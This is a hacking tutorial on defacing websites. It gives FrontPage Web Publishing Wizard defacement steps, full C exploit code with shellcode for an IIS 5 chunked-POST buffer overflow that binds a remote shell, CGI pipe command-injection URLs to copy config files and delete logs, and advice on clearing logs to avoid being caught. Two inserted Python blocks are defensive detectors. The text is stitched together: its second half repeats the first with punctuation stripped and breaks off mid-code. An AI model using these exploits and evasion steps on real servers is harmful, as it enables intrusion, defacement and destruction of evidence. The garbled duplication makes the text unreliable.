This is one of the methods of website defacement, using Microsoft Web Publishing Wizard. With this method one can deface websites that have FrontPage Server Extensions: through Microsoft Web Publishing Wizard one can replace the pages of a FrontPage-extended web.

Follow the steps given below to execute the exploit.

Telnet to the target website or web server on port 80:

C:\>telnet www.victim.com 80

You will get a blank screen. Type GET and keep pressing Enter until the web server responds to your request:

GET <ENTER><ENTER>

NOTE: Web servers running IIS have FrontPage Extensions enabled by default.

So after pressing Enter you will get the following:

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 17 Feb 2006 04:18:45 GMT
Content-Type: text/html
Content-Length: 87

Once you get the HTTP Bad Request, you have to search for the homepage. Most sites have the default homepage at one of:

http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html

Keep trying all the possible FrontPage extensions until the page loads; if the file doesn't exist you will get a 404 error. Let us say you have found the homepage at www.victim.com/index.html. So design the page you want to upload, or modify the homepage; here the homepage is index.html, so once you have designed or modified the page, save it as index.html.

Now open Web Publishing Wizard and follow the steps given below:

- Open Microsoft Web Publishing Wizard.
- Browse to the file you are going to upload. Here index.html is the file we are going to upload.
- You now get a screen where you have to name the web server. Type in anything and click Advanced.
- Select the service provider from the drop-down box. This is nothing but the kind of upload it is going to do. Since your motive is to deface the site, select the FrontPage Extended Web option, since this method of defacing works only for FrontPage-enabled sites.
- Type the URL of the victim server's homepage in the given box; here it is www.victim.com/index.html.
- Here specify the URL that you type in the web browser to access the victim server's website.
- Select the connection method that you use to access the internet.
- Click Finish. Voila, you have successfully replaced the victim's homepage with yours.

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some exploit coding. I am going to present some exploit code written in the most powerful programming language, C.

/*
  Windows 2000 Server Exploit By CHINANSL Security Team
  Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
  Warning: THIS PROGRAM WILL ONLY TEST!
  CHINANSL Technology CO.,LTD  http://www.chinansl.com
  keji@chinansl.com
  Use MS VC++ to compile this piece of code.
*/
#include "stdafx.h"      /* MSVC precompiled header; an empty stdafx.h is enough */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
    if(argc != 4)
    {
        printf("%s ip port aspfilepath\n\n",argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]);
        puts(" programed by keji@chinansl.com");
        return 0;
    }
    DWORD srcdata=0x01e2fb1c-4;   //0x00457474
    //address of SHELLCODE
    DWORD jmpaddr=0x00457494;     //0x77ebf094; //0x01e6fcec; //"\x1c\xfb\xe6\x01"; //"\x0c\xfb\xe6\x01";
    char* destIP=argv[1];
    char* destFile=argv[3];
    int webport=atoi(argv[2]);
    char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";   //16 bytes

    WSADATA ws;
    SOCKET s;
    long result=0;
    if(WSAStartup(0x0101,&ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }
    struct sockaddr_in addr;
    addr.sin_family=AF_INET;
    addr.sin_port=htons(webport);
    addr.sin_addr.s_addr=inet_addr(destIP);
    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==-1)
    {
        puts("Socket create error");
        return -1;
    }
    if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }
    char buff[4096];
    char* shellcode=
    "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
    "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
    "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
    "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
    "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
    "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
    "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
    "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
    "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
    "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
    "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
    "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
    "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
    "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
    "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
    "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
    "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
    "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
    "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
    "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
    "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
    "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
    "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
    "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
    "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
    "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
    "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
    "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
    "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
    "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
    "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
    "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
    "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
    "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
    "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
    "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
    "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
    "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
    "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
    "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
    "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
    "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
    "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
    "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
    "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
    "\xff\xff\x95\x18\xff\xff\xff";

    char* s1="POST ";                                   // request-line prefix; " HTTP/1.1\r\n" is in the format below
    char* s2="Accept: */*\r\n";                          // "*/*" assumed, lost in extraction
    char* s4="Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5="Transfer-Encoding: chunked\r\n\r\n";
    char* sc="0\r\n\r\n\r\n";                            // last-chunk

    char shellcodebuff[1024*8];
    memset(shellcodebuff,0x90,sizeof(shellcodebuff));   // NOP sled with the shellcode at the end
    memcpy(&shellcodebuff[sizeof(shellcodebuff)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff)-1] = 0;

    char sendbuff[1024*16];
    memset(sendbuff,0,1024*16);
    // chunked body: one 16-byte chunk (pad) followed by the AAAA/BBBB placeholders,
    // which are overwritten with srcdata and jmpaddr below rather than formatted here
    sprintf(sendbuff,"%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad,sc);
    int sendlen=strlen(sendbuff);
    *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

    result=send(s,sendbuff,sendlen,0);
    if(result == -1 )
    {
        puts("Send shellcode error");
        return -1;
    }
    memset(buff,0,4096);
    result=recv(s,buff,sizeof(buff),0);
    if(strstr(buff,"<html>") != NULL)
    {
        shutdown(s,0);
        closesocket(s);
        puts("Send shellcode error,Try again");
        return -1;
    }
    shutdown(s,0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n",destIP);
    puts("If you cannot connect to the host,try run this program again!");
    return 0;
}

The above code is called exploit code; exploits are written in powerful programming languages like C, Perl or sometimes Java. Exploit code is written according to the vulnerability. The vulnerabilities were discovered in the past, and nowadays server software and operating systems are usually patched for them, so you can't just execute exploit code to break into a server; you must rework the exploit so that it works according to your needs. One more thing I must mention: you must keep yourself updated with the latest vulnerabilities by visiting the sites I mentioned earlier in the tutorial. I think it's better that you code your own exploits in Perl or C in order to break into websites.

NOTE: I am talking about high-profile websites, not lame websites coded in Notepad.

Keeping yourself safe

You must be familiar with server software like Apache, Microsoft IIS, etc., so you must know about the log files, which record each and every request made to the server. As they record everything, system administrators will have no problem catching the malicious cracker or script kiddie: the log file will hold the IP (Internet Protocol) address, and through the IP address the cracker or script kiddie can be traced.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted, you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. So you can use the cross-site scripting vulnerability to clear the log files, by executing the following URL:

http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL can be used against Apache server software.

In the case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The CHINANSL code reproduced in the previous section exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful, all you have to do is telnet to port 1111 of the target and the system is yours.


IMPLEMENTATION OF THE CODE

To use the C code you must compile it and run it. Now you must be wondering what the use of this code is. The C code causes an overflow in IIS on Windows 2000 and makes the system bind a shell on port 1111. So once the exploit works there will be a shell bound to port 1111 on the target system. To make use of it, telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.
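What the program above actually sends is a chunked POST to an .asp file whose chunk sizes and chunk data the ASP handler in IIS 5.0 did not handle safely. The defensive counterpart is a decoder that refuses the shapes such a request depends on, plus a content check, since a form-urlencoded body should be printable text and not padding bytes. The Python below is an added example written for this page; it is neither the tutorial's code nor anything from IIS. The size limits are assumed values, and the sample streams are constructed: EXPLOIT_SHAPED copies only the chunk layout the C code builds (a 16-byte pad chunk, two 4-byte placeholder chunks, then last-chunk) and carries no shellcode.

```python
"""Strict HTTP/1.1 chunked-body decoder plus a content check for form POSTs."""
import re

MAX_CHUNK_BYTES = 64 * 1024      # assumed per-chunk ceiling
MAX_BODY_BYTES = 1024 * 1024     # assumed ceiling on the decoded body

# chunk-size is 1..8 hex digits, optionally followed by a chunk extension.
# No sign, no whitespace, no decimal: the size is never read through a signed conversion.
CHUNK_SIZE_RE = re.compile(rb"^([0-9A-Fa-f]{1,8})(?:;[^\r\n]*)?$")


class ChunkedError(ValueError):
    """Raised for any chunk stream the decoder will not accept."""


def decode_chunked(raw: bytes, max_chunk: int = MAX_CHUNK_BYTES,
                   max_body: int = MAX_BODY_BYTES) -> bytes:
    """Decode a chunked body, refusing malformed, oversized or truncated streams."""
    body = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ChunkedError("chunk-size line not terminated by CRLF")
        match = CHUNK_SIZE_RE.match(raw[pos:eol])
        if match is None:
            raise ChunkedError(f"malformed chunk-size line {raw[pos:eol]!r}")
        size = int(match.group(1), 16)
        pos = eol + 2
        if size == 0:
            # last-chunk: skip any trailer lines, require the closing empty line
            while True:
                eol = raw.find(b"\r\n", pos)
                if eol < 0:
                    raise ChunkedError("trailer section not terminated")
                if eol == pos:
                    return bytes(body)
                pos = eol + 2
        if size > max_chunk:
            raise ChunkedError(f"chunk size {size} exceeds limit {max_chunk}")
        if len(body) + size > max_body:
            raise ChunkedError("decoded body would exceed limit")
        data = raw[pos:pos + size]
        if len(data) != size:
            raise ChunkedError("chunk data truncated")
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ChunkedError("chunk data not followed by CRLF")
        pos += 2
        body += data


def rejects(raw: bytes) -> bool:
    """True if decode_chunked refuses the stream."""
    try:
        decode_chunked(raw)
    except ChunkedError:
        return True
    return False


def suspicious_form_body(body: bytes, sled_len: int = 32, max_binary_ratio: float = 0.3) -> bool:
    """Flag a form-urlencoded body that carries machine code rather than text.

    Two signals: a run of 0x90 (x86 NOP) bytes, the padding the exploit above
    fills its buffer with, or a high share of non-printable bytes.
    """
    if not body:
        return False
    if b"\x90" * sled_len in body:
        return True
    binary = sum(1 for b in body if (b < 0x20 and b not in b"\r\n\t") or b >= 0x7F)
    return binary / len(body) > max_binary_ratio


def verdict(raw: bytes) -> str:
    """Single-call summary for a request body: 'reject', 'suspicious' or 'ok'."""
    try:
        body = decode_chunked(raw)
    except ChunkedError:
        return "reject"
    return "suspicious" if suspicious_form_body(body) else "ok"


# Constructed streams (not captured traffic).
BENIGN = b"5\r\nuser=\r\n5\r\nalice\r\n0\r\n\r\n"
EXPLOIT_SHAPED = (b"10\r\n" + b"\xcc" * 4 + b"ADPA" + b"\x02" * 4 + b"PADP" + b"\r\n"
                  + b"4\r\nAAAA\r\n4\r\nBBBB\r\n0\r\n\r\n\r\n")
NOP_SLED = b"100\r\n" + b"\x90" * 256 + b"\r\n0\r\n\r\n"
OVERSIZED = b"FFFFFFFF\r\n" + b"A" * 16 + b"\r\n0\r\n\r\n"
NEGATIVE = b"-1\r\n" + b"A" * 16 + b"\r\n0\r\n\r\n"

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("exploit-shaped", EXPLOIT_SHAPED),
                         ("nop-sled", NOP_SLED), ("oversized", OVERSIZED), ("negative", NEGATIVE)]:
        print(f"{name:15s} {verdict(sample)}")
```

Note that EXPLOIT_SHAPED is structurally valid chunked encoding: a decoder alone passes it, and only the content check fires. That is the point of running both: the size checks stop the sizes a vulnerable parser mishandles (a 4 GiB chunk, a negative one), while the content check catches a well-formed request whose body is binary where text is expected.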

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Even government websites are defaced, for different reasons; the most common reason is cyber war. Just as in reality there are wars between two rival countries, in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site:

http://defaced.alldas.org

Now some security measures for system administrators:

- First of all you must coordinate and organize your web root into suitable directories. What I mean to say is that you must organize your files: images in an image directory, one directory for server side content, and so on. If you don't configure your web root properly, your web server will be prone to many attacks.
- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability. The last thing is that you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out at the root.

So this completes my tutorial on Defacing websites. I hope you have understood the intricacies of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM


uploaded to the server and downloaded from the server through the HTTP protocol.

NOTE: Files can be uploaded to the server and downloaded from the server through the HTTP protocol without the need for any type of authentication.

This technique was employed and executed years ago. Soon computer enthusiasts realized that this kind of technique was a huge security threat, so they developed new techniques to subdue it. Nowadays web servers are designed and configured so as to give write access only to selected virtual directories.

TIP: Try telnetting to a web server and find out some good information about the server and its behavior.

Now I am going to explain some commonly used commands supported by a web server.

GET: It is used by the browser (client) to request read access to a file residing on the server.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
GET /index.html HTTP/1.1\r\n\r\n

Sidetrack: The HTML (Hypertext Markup Language) source code of the index.html page residing on the server will be returned; if you request an ASP or PHP page or any other server side executable page, the dynamically generated HTML page will be shown instead.

DEL: This is a command for deleting files on the web server. This command requires write access on the virtual directory where the file to be deleted resides.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
DEL /index.html HTTP/1.1\r\n\r\n

Sidetrack: Most probably you will get a 403 Forbidden error, as it is quite obvious that the wwwroot directory will never have write access.

PUT: It is used to create files on the server; it requires write access on the particular virtual directory where the file is to be created.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
PUT /cc.txt HTTP/1.1\r\n\r\n

Sidetrack: Most probably you will get a 403 Forbidden error, as it is quite obvious that the wwwroot directory will never have write access.

ECHO: The publishing tool. It is the same command used in DOS (Disk Operating System) batch files, and its output can be redirected.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
ECHO Site defaced by SB >> index.html HTTP/1.1\r\n\r\n

TIP: SB is the acronym of my name, Shubham Bhattacharya. When you are defacing a site you can also use the acronym of your name.

PROPFIND: PROPFIND is used as a request for directory browsing.

NOTE: On an IIS server it is used as an administrative tool for web server analysis.

Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
Connected to www.hackingtheworld.ilitehost.com
PROPFIND / HTTP/1.1
Host: iis-server
Content-Length: 0

Sidetrack: You will definitely get a 403 Forbidden error, as it is quite evident that the wwwroot will never have write access.

You must be wondering how you can test the write access permission of a particular directory on an IIS server. To do so, follow the steps given below:

- To test whether write access is enabled for anonymous web clients, telnet to the web server or website on port 80 and make the following request:

PUT /scripts/htw.asp HTTP/1.1
Host: iis-server
Content-Length: 10 <enter><enter>

Once you make the above request the server should respond with a 100 Continue message:

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving the above, type 10 letters:

XXXXXXXXXX

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 17 Feb 2006 10:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with this 201 Created response, then write permission is enabled.
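Every probe on this page leaves a line in the access log before anything else happens: the PUT above and the DEL/PUT/PROPFIND requests before it, the cgi-bin pipe URL, the httpd.conf fetch, the log-wiping DEL, and the Web Publishing Wizard upload, which goes through the FrontPage Server Extensions authoring endpoint /_vti_bin/_vti_aut/author.dll. The script below is an added example written for this page, not code from the tutorial: it parses constructed Apache common-log and IIS W3C-style lines, flags each of those patterns, and separates attempts from successes by status code. Every log line, address and path in it is made up for the example. Forward the log to another host as it is written; the DEL in the CLEARING LOGS section then removes only the local copy.

```python
"""Flag access-log lines matching the write/execute probes described on this page."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: Apache common log format lines, then IIS W3C-style lines
# (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2006:04:18:45 +0000] "GET /index.html HTTP/1.1" 200 1872
203.0.113.7 - - [17/Feb/2006:04:19:02 +0000] "GET /cgi-bin/test-cgi.bat|copy+conf\\httpd.conf+htdocs\\httpd.conf HTTP/1.1" 200 0
203.0.113.7 - - [17/Feb/2006:04:19:10 +0000] "GET /httpd.conf HTTP/1.1" 200 14233
203.0.113.7 - - [17/Feb/2006:04:25:41 +0000] "GET /cgi-bin/test-cgi.bat|DEL+log HTTP/1.1" 200 0
2006-02-17 10:56:08 198.51.100.9 PUT /scripts/probe.asp - 201
2006-02-17 10:57:30 198.51.100.9 DELETE /index.html - 403
2006-02-17 10:58:02 198.51.100.9 PROPFIND / - 403
2006-02-17 11:02:15 198.51.100.9 POST /_vti_bin/_vti_aut/author.dll - 200
2006-02-17 11:05:00 192.0.2.44 GET /default.htm - 200
"""

APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
IIS_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (?P<ip>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) \S+ (?P<status>\d{3})"
)

# Methods that change content on the server; the PUT test on this page is one of them.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
CONF_AT_WEB_ROOT = re.compile(r"^/[^/]+\.conf$", re.IGNORECASE)
FRONTPAGE_AUTHOR = "/_vti_bin/_vti_aut/author.dll"


@dataclass(frozen=True)
class Finding:
    ip: str
    method: str
    uri: str
    status: int
    reason: str

    @property
    def succeeded(self) -> bool:
        """A 2xx answer means the server honoured the request, not merely saw it."""
        return 200 <= self.status < 300


def parse_line(line: str) -> Optional[Tuple[str, str, str, int]]:
    """Return (ip, method, uri, status) for either log format, or None if unparsable."""
    match = APACHE_RE.match(line) or IIS_RE.match(line)
    if match is None:
        return None
    return match.group("ip"), match.group("method"), match.group("uri"), int(match.group("status"))


def classify(method: str, uri: str) -> List[str]:
    """Map one request to the probe patterns described on this page."""
    reasons = []
    if method in WRITE_METHODS:
        reasons.append(f"write-capable method {method}")
    if method == "PROPFIND":
        reasons.append("WebDAV PROPFIND directory enumeration")
    if "/cgi-bin/" in uri and "|" in uri:
        reasons.append("pipe in CGI request (test-cgi.bat command injection)")
    if uri.lower().startswith(FRONTPAGE_AUTHOR):
        reasons.append("FrontPage Server Extensions authoring endpoint")
    if CONF_AT_WEB_ROOT.match(uri):
        reasons.append("configuration file fetched from web root")
    return reasons


def scan(log_text: str) -> List[Finding]:
    """One Finding per (line, reason); unparsable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, method, uri, status = parsed
        for reason in classify(method, uri):
            findings.append(Finding(ip, method, uri, status, reason))
    return findings


def successful_probes(findings: List[Finding]) -> List[Finding]:
    return [f for f in findings if f.succeeded]


def by_ip(findings: List[Finding]) -> dict:
    """Count findings per source address, the first thing a responder asks for."""
    counts: dict = {}
    for f in findings:
        counts[f.ip] = counts.get(f.ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        flag = "SUCCESS" if f.succeeded else "attempt"
        print(f"{flag:8s} {f.ip:14s} {f.method:8s} {f.status} {f.uri}  <- {f.reason}")
    print("per source:", by_ip(hits))
```

The 403 lines matter as much as the 201: they show the same address walking through DELETE and PROPFIND before the PUT that worked, which is the sequence this page teaches and the one a responder wants to see in order.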

EXECUTION ACCESS

Server side pages like ASP PHP JSP or DLL are used in highly

advanced database driven dynamic websites which dynamically

generates the HTML and sends it to the client (web browser)

These server side pages and other executables including DLL and

EXE files needs execution perquisites in the virtual directory

where they are kept

NOTE DLL EXE etc need execution perquisites they are kept in a

single virtual directory

DIRECTORY SURFING

It has been often seen that web servers to be more specific

virtual directories of web servers are configured as such to

provide directory surfing access to all clients or special clients

through proper authentications Actually directory browsing

means that you can list the file and folders present in your virtual

directory just as you see in your standalone system Well most of

the web server administrators turn off this feature But exploit

codes can be used to get directory listing of the virtual directory

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well if you are not familiar with apache then let me give you a

brief description Apache is a server in which you have to

configure your web server using command and scripts These

scripts and commands are kept in httpdconf file in capache

groupapacheconf folder default Apache installation on a

distinctive windows system This file contains all the settings of

the web server and if we get our hands into this file then we get

to know all the settings of the web server including the location of

log files directory permissions write access authentication levels

etc

So now letrsquos get on with the exploit As we know that Apache is

the most preferred web server This web server has a bat in its

cgi-bin directory This bat file is named as test-cgibat Actually

the motive of the bat file is to test the privileges of cgi-bin

directory

NOTE cgi-bin directory contains all the CGI and Perl scripts

Well it is quiet obvious that cgi-bin virtual directory has execution

permissions These conditions are exploited to perform out

pernicious attacks The bat file in Apache web server is called as

execution of DOS (Disk Operating Systems) The DOS shell is

spawned to it for execution Now we can use | (pipe) character

along with the batch file to execute commands on the remote

server

NOTE If you donrsquot know how to put the | (pipe) character then

donrsquot worry To put the pipe character press Alt+ the

character is just beside your backspace key

So the attack URL will be like this

httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd

conf+htdocshttpdconf

Through the above URL I have copied the httpdconf file from the

conf directory The conf directory mostly does not have read

access to the Apache web root that is htdocs virtual folder Now

we can easily download the httpdconf file using the following

URL

httptargetcomhttpdconf

Since it occupies in the Apache web root Through this method

you will get the httpdconf file and through the httpdconf file you

can get some worthful information about the web server

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities

related with the server software or the Operating System running

the server software Well most of the lsquohackersrsquo deface websites

using vulnerabilities Please note I am talking about hackers not

script kiddies who deface websites using uncanny softwares So

you must know what vulnerability is well if you donrsquot know then

let me tell you all Vulnerability is an existing flaw or defect in the

software architecture which allows a hacker or cracker to take

control over the system or issue capricious system commands to

the server In every software or application or tool vulnerabilities

persist

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

The above sites contain latest vulnerabilities with exploit codes

Even if you are an elite or a professional you will find the

information useful

Working with Exploits

Well I must say this is the most exciting part of this tutorial

Okay so wwwvictimcom is the target site Well through the

above methods I mean the methods I have explained earlier in

the tutorial through those methods we have found out that the

website is functioning in Microsoft IIS server software So it is

time to find some vulnerability I am using Acutenix Web Security

Scanner to scan for vulnerabilities You guys must know

programming languages like Perl or Socket Programming or C this

is essential because through this you will be able to compile the

exploits So once you get vulnerability try exploiting it by

executing it in your client (browser)

MICROSOFT FRONPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft

Web Publishing Wizard Using this method one can deface

Websites having FrontPage Server extensions By using Microsoft

Web Publishing Wizard one can replace FrontPage Server

extension pages

Follow the steps given below to execute the following exploit

Telnet the Target website or web server in port 80

CTelnet wwwvictimcom 80

You will get a blank screen type GET and continue pressing

enter till the web server responds to your requests

GET ltENTERgtltENTERgt

NOTE Web servers functioning in IIS server have FrontPage

Extensions enabled by default

So After pressing enter you will get the following

HTTP11 400 Bad Request

Server Microsoft-IIS50

Date Thu 17 Feb 2006 041845 GMT

Content-Type texthtml

Content-Length 87

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

```c
/*
